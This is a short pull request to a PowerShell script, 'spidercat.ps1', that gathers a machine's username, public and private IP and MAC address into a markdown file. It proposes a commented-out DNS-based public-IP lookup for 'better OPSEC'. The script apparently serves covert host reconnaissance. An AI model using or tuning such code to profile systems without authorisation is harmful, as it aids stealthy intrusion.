### PR TITLE
Replace curl.exe with native Powershell

### DIFF
--- a/spidercat.ps1
+++ b/spidercat.ps1
@@ -10,6 +10,8 @@ $username = $env:username
 $markdown = "$account.md"
 
 # network values
+# possible replacement for using curl.exe (better OPSEC)
+# $public = Resolve-DnsName -Server ns1.google.com -Type TXT -Name o-o.myaddr.l.google.com | Select-Object -ExpandProperty 'Strings'
 $public = curl.exe https://ident.me
 $private = (get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}).ipaddress[0]
 $MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)


### PR DESCRIPTION
It appears that this relies on curl.exe being present and usable on the system, this method would allow full usage of Powershell v3+, and provide better OPSEC by using Googles public DNS rather than a 3rd party website.